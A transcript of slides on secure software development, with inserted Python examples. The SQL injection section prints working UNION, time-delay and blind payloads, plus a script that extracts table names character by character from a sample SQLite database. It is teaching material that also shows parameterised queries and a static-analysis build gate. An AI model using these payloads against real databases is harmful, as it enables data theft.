secure software development presentation
DESCRIPTION
A presentation on why software must be built securely and on the methods for doing so.
TRANSCRIPT
![Page 2: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/2.jpg)
![Page 3: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/3.jpg)
![Page 4: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/4.jpg)
![Page 5: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/5.jpg)
![Page 6: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/6.jpg)
![Page 7: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/7.jpg)
![Page 8: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/8.jpg)
![Page 9: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/9.jpg)
![Page 10: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/10.jpg)
An example to see why
![Page 11: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/11.jpg)
Top Ten Attacks
• Open Web Application Security Project
• Injection
• Broken Authentication and Session Management
• Cross-Site Scripting (XSS)
• Insecure Direct Object References
• Security Misconfiguration
owasp.org/index.php/Top_10_2013-T10
![Page 12: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/12.jpg)
SQL Injection
http://www-935.ibm.com/services/us/iss/xforce/trendreports/
![Page 13: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/13.jpg)
SQL Injection
![Page 14: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/14.jpg)
• Fill in the blanks!
• SELECT OrderId FROM Sales WHERE CustomerId = ' '
• SELECT OrderId FROM Sales WHERE CustomerId = '' UNION SELECT Table_Name FROM INFORMATION_SCHEMA.Tables; -- '
SQL Injection
![Page 15: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/15.jpg)
SELECT OrderID FROM Sales WHERE CustomerID = ' '
Giving Information to the Attacker
Attacker input: a lone single quote (') breaks the query, and the database error message that comes back tells the attacker what is behind the form.
![Page 16: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/16.jpg)
Giving Information to the Attacker
![Page 17: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/17.jpg)
Hide the Error
• Catch the database error and redirect, so the attacker no longer sees the error message:

    try {
        resultSet = READ FROM DATABASE;
    } catch (error) {
        redirect("home.html");
    }
    if (resultSet.RowCount > 0)
        redirect("history.html");
    else
        redirect("home.html");

Flowchart: Read from DB → Error? Yes: go to "home". No: Is Result > 0? Yes: go to "history". No: go to "home".
![Page 18: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/18.jpg)
CustomerID = '                      → go to "home"
CustomerID = ' ; delay 1 min. ; --  → wait 1 min., then go to "home"
The page looks the same either way, but the delay tells the attacker that the injected statement ran.
Blind SQL Injection
![Page 19: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/19.jpg)
Is the first letter of the name of the first table an 'A'? No, it's not: go to "home"
Is the first letter of the name of the first table a 'B'? Yes, it is: go to "history"
SELECT OrderID FROM Sales WHERE CustomerID = '' OR MID((SELECT table_name FROM INFORMATION_SCHEMA.tables LIMIT 1), 1, 1) = 'A'
Repeating the question for every position and every letter recovers the whole table name, one yes/no answer at a time.
Blind SQL Injection
![Page 20: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/20.jpg)
Solutions
• Validate Input
  • No SQL syntax
  • No single quote
    • What about Mr. John O'Malley?
    • Attacks without a literal single quote, e.g. URL encoding (%27)
  • Prevent OR 1 = 1
  • Regex
• Encode or escape
![Page 21: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/21.jpg)
![Page 22: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/22.jpg)
Regexlib.com, search for "person's name": the regex allows apostrophes, so the SQL injection X' OR A IS NOT NULL passes validation.
![Page 23: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/23.jpg)
Solutions
• Validate Input
  • No SQL syntax
• Escape input
  • Insert backslash
• Parameterized queries
• Stored Procedures (only if they do not build dynamic SQL from their arguments internally)
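As an added example (not code from the slides), the following Python script walks through the attack sequence of the SQL Injection slides and the parameterised fix from the Solutions slides against a constructed SQLite database: the string-built "fill in the blanks" query, the error-hiding redirect handler, the UNION dump of table names, the blind yes/no probe generalised to recover a whole table name, and the parameterised replacement that turns the same payloads into harmless data. SQLite is an assumption standing in for the slides' database: it keeps table names in sqlite_master rather than INFORMATION_SCHEMA.tables, uses substr() for MID(), and has no delay function, so the time-based probe is not shown. The "person's name" regex is an assumed stand-in for the regexlib.com pattern.

```python
import re
import sqlite3
import string


def make_db():
    """Constructed sample data (not from the slides): an orders table plus a
    table whose name the attacker wants to learn."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Sales (OrderID INTEGER, CustomerID TEXT);
        CREATE TABLE Billing (CardNumber TEXT);
        INSERT INTO Sales VALUES (1, 'C100'), (2, 'C100'), (3, 'C200');
    """)
    return conn


def lookup_orders_vulnerable(conn, customer_id):
    """The slides' 'fill in the blanks' query: input pasted into the SQL text."""
    sql = "SELECT OrderID FROM Sales WHERE CustomerID = '" + customer_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_orders_safe(conn, customer_id):
    """Parameterised query: the value travels separately from the SQL text,
    so quotes and keywords inside it are data, never syntax."""
    sql = "SELECT OrderID FROM Sales WHERE CustomerID = ?"
    return [row[0] for row in conn.execute(sql, (customer_id,))]


def page_for(conn, customer_id):
    """The 'Hide the Error' handler: errors and empty results both go 'home'.
    It still leaks one bit per request, which is all blind injection needs."""
    try:
        rows = lookup_orders_vulnerable(conn, customer_id)
    except sqlite3.Error:
        return "home"
    return "history" if rows else "home"


def union_dump_table_names(conn):
    """The UNION payload: close the quote, append a second SELECT, and comment
    out the trailing quote the application adds. SQLite keeps its catalogue in
    sqlite_master instead of INFORMATION_SCHEMA.tables."""
    payload = "' UNION SELECT name FROM sqlite_master WHERE type = 'table' --"
    return sorted(lookup_orders_vulnerable(conn, payload))


def blind_extract_first_table_name(conn, max_len=32):
    """The slides' single probe generalised: ask 'is character N of the first
    table name equal to C?' for every N and C until the name is complete.
    substr() is SQLite's MID()."""
    alphabet = string.ascii_letters + string.digits + "_"
    name = ""
    for pos in range(1, max_len + 1):
        hit = None
        for c in alphabet:
            payload = ("' OR substr((SELECT name FROM sqlite_master WHERE type = 'table' "
                       "ORDER BY name LIMIT 1), %d, 1) = '%s" % (pos, c))
            if page_for(conn, payload) == "history":
                hit = c
                break
        if hit is None:
            break  # no character matched: we are past the end of the name
        name += hit
    return name


# Assumed "person's name" regex that allows apostrophes, standing in for the
# regexlib.com entry the slides mention. It admits Mr. O'Malley and the
# injection alike: validation does not replace parameterisation.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z'. ]*$")


def looks_like_a_name(value):
    return NAME_RE.match(value) is not None


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:", lookup_orders_vulnerable(db, "C100"))
    print("UNION dump of table names:", union_dump_table_names(db))
    print("blind extraction:", blind_extract_first_table_name(db))
    print("same payload, parameterised:",
          lookup_orders_safe(db, "' UNION SELECT name FROM sqlite_master WHERE type = 'table' --"))
    print("regex accepts injection:", looks_like_a_name("X' OR A IS NOT NULL"))
```

The blind loop is the part worth studying: it never sees an error or a result set, only which page came back, yet it reads the catalogue character by character. Swapping the query builder for the parameterised version makes every one of these payloads return an empty result, because the driver never lets the value touch the SQL grammar.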
![Page 24: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/24.jpg)
Bake Security In
![Page 25: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/25.jpg)
Cost
• “Economic Impacts of Inadequate Infrastructure for Software Testing”
nist.gov/director/planning/upload/report02-3.pdf
Chart: Relative Cost to Fix Software Defects (y-axis 0 to 35, relative cost) by phase: Req. / Design, Coding / Unit Testing, Integration Testing, Customer Beta Testing, Release.
![Page 26: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/26.jpg)
Time
Timeline: Schedule a pentest → Pentest → Find vulnerabilities → Hold release to fix → Fix
![Page 27: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/27.jpg)
How to bake security in?
![Page 28: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/28.jpg)
Training
![Page 29: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/29.jpg)
Threat Modeling
• Ultimate pessimist’s game
• Many Approaches
• Asset-centric
• Attacker-centric
• Software-centric
• Mitigation
• E.g. encrypt database
![Page 30: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/30.jpg)
SDL Threat Modeling Tool
• A Data Flow Graph
• STRIDE
• Spoofing
• Tampering
• Repudiation
• Information disclosure
• Denial of service
• Elevation of privilege
Data flow diagram of the example: User → processes "Add item into cart" and "View cart contents" → data stores "User database", "Product Catalog", "Cart Database".
![Page 31: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/31.jpg)
Secure Coding Libraries
• Don't reinvent the wheel
• Code review
• Correctness or Disuse
• OWASP AntiSamy or Microsoft Anti-XSS
• OpenSSL
![Page 32: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/32.jpg)
Secure Coding Libraries
Bryan Sullivan and Vincent Liu, Web Application Security, McGraw Hill, 2011
![Page 33: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/33.jpg)
Code Review
![Page 34: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/34.jpg)
Static Analysis Tools
• White-Box Testing
• Integrate them
• Build process
• Code repository server
• False positive reports
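As an added example (not one of the tools listed on the next slide, and not code from the slides), here is a minimal static analyser in Python that a build step or a repository-server hook could run to reject the query-building pattern from the SQL Injection slides. The sample source it scans is constructed inline. It is deliberately simple: any execute-style call whose SQL argument was built at run time (concatenation, %-formatting, str.format, f-string, or a variable assigned one of those) is reported, so a query assembled only from constants would be flagged too, a false positive of the kind the slide warns about. The file name and command line in the usage note are assumptions.

```python
import ast
import sys

# Constructed sample input (not from the slides): two query builders that paste
# input into the SQL text and one that passes it as a parameter.
SAMPLE_SOURCE = '''\
def vulnerable_concat(conn, customer_id):
    sql = "SELECT OrderID FROM Sales WHERE CustomerID = '" + customer_id + "'"
    return conn.execute(sql).fetchall()

def vulnerable_fstring(conn, customer_id):
    return conn.execute(f"SELECT OrderID FROM Sales WHERE CustomerID = '{customer_id}'").fetchall()

def safe_parameterised(conn, customer_id):
    return conn.execute("SELECT OrderID FROM Sales WHERE CustomerID = ?", (customer_id,)).fetchall()
'''

# DB-API methods that hand a string to the database engine.
SINK_METHODS = {"execute", "executemany", "executescript"}


class DynamicSqlFinder(ast.NodeVisitor):
    """Flags calls to execute-style methods whose SQL argument is built at run
    time, or is a name that was assigned such a value earlier in the file."""

    def __init__(self):
        self.tainted = set()   # names assigned a dynamically built string
        self.findings = []     # (line number, description)

    def is_dynamic(self, node):
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Mod)):
            return True        # "..." + x  or  "..." % x
        if isinstance(node, ast.JoinedStr):
            return True        # f"..."
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr == "format"):
            return True        # "...".format(x)
        return isinstance(node, ast.Name) and node.id in self.tainted

    def visit_Assign(self, node):
        # Remember names that hold a run-time-built string (assignment precedes use).
        if self.is_dynamic(node.value):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    self.tainted.add(target.id)
        self.generic_visit(node)

    def visit_Call(self, node):
        if (isinstance(node.func, ast.Attribute) and node.func.attr in SINK_METHODS
                and node.args and self.is_dynamic(node.args[0])):
            self.findings.append(
                (node.lineno, "SQL built from run-time values reaches %s()" % node.func.attr))
        self.generic_visit(node)


def scan_source(source, filename="<source>"):
    """Return [(line, message), ...] for one Python source text."""
    finder = DynamicSqlFinder()
    finder.visit(ast.parse(source, filename))
    return finder.findings


def scan_files(paths):
    """Build-gate entry point: prints findings, returns 1 if any (fail the build), else 0."""
    total = 0
    for path in paths:
        with open(path) as fh:
            for line, msg in scan_source(fh.read(), path):
                print("%s:%d: %s" % (path, line, msg))
                total += 1
    return 1 if total else 0


if __name__ == "__main__":
    if len(sys.argv) > 1:
        sys.exit(scan_files(sys.argv[1:]))
    for line, msg in scan_source(SAMPLE_SOURCE):
        print("sample:%d: %s" % (line, msg))
```

Wired into a build as, for instance, `python sql_gate.py src/*.py` (assumed file name), the non-zero exit status fails the build the moment someone reintroduces string-built SQL, which is the "integrate them into the build process" point of the slide. The false-positive budget is the trade-off to watch: a check this blunt must be either tuned or paired with a review step, or developers will learn to ignore it.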
![Page 35: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/35.jpg)
Automated Analysis Tools

| Tool | Lang / Framework | Free / Commercial |
| --- | --- | --- |
| FindBugs™ | Java | Free (LGPL) |
| OWASP LAPSE+ | Java | Free (GPL) |
| FxCop | .NET | Free (Ms-PL) |
| PHP Security Scanner | PHP | Free (GPL) |
| JSLint | JavaScript | Free (LGPL) |
| HP Fortify Source Code Analyser | C/C++, .NET, Java, PHP, others | Commercial |
![Page 36: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/36.jpg)
Security Testing
• Functional test approach
• Black-Box Testing
• Just like a Hacker
• Active
• Passive
![Page 37: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/37.jpg)
Black-Box Testing Tools
IBM Rational AppScan
• Active
• Commercial
OWASP WebScarab
• Passive
• Free
![Page 38: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/38.jpg)
Black-Box vs. White-Box
Diagram: the system boundary encloses the components (GoF#, Scala, Admin.php); black-box testing sees only what crosses the boundary, white-box testing sees inside it.
![Page 39: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/39.jpg)
Security Incident Response planning
![Page 40: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/40.jpg)
Industry Standard Secure Development Methodologies
![Page 41: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/41.jpg)
![Page 42: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/42.jpg)
![Page 43: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/43.jpg)
![Page 44: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/44.jpg)
![Page 45: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/45.jpg)
Trustworthy Computing Memo
![Page 46: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/46.jpg)
Security Development Lifecycle (SDL)
Training: Core Security Training
Requirements: Establish Security Requirements; Create Quality Gates/Bug Bars; Security & Privacy Risk Assessment
Design: Establish Design Requirements; Analyze Attack Surface; Threat Modeling
Implementation: Use Approved Tools; Deprecate Unsafe Functions; Static Analysis
Verification: Dynamic Analysis; Fuzz Testing; Attack Surface Review
Release: Incident Response Plan; Final Security Review; Release Archive
Response: Execute Incident Response Plan
microsoft.com/sdl
![Page 47: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/47.jpg)
SDL-Agile
![Page 48: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/48.jpg)
OWASP Comprehensive Lightweight Application Security Process (CLASP)
Roles:
Project manager
Security Auditor
Test Analyst
Implementer
Architect
Requirements Specifier
Designer
![Page 49: Secure software development presentation](https://reader034.vdocuments.mx/reader034/viewer/2022052321/554f7a3ab4c9052a518b49c8/html5/thumbnails/49.jpg)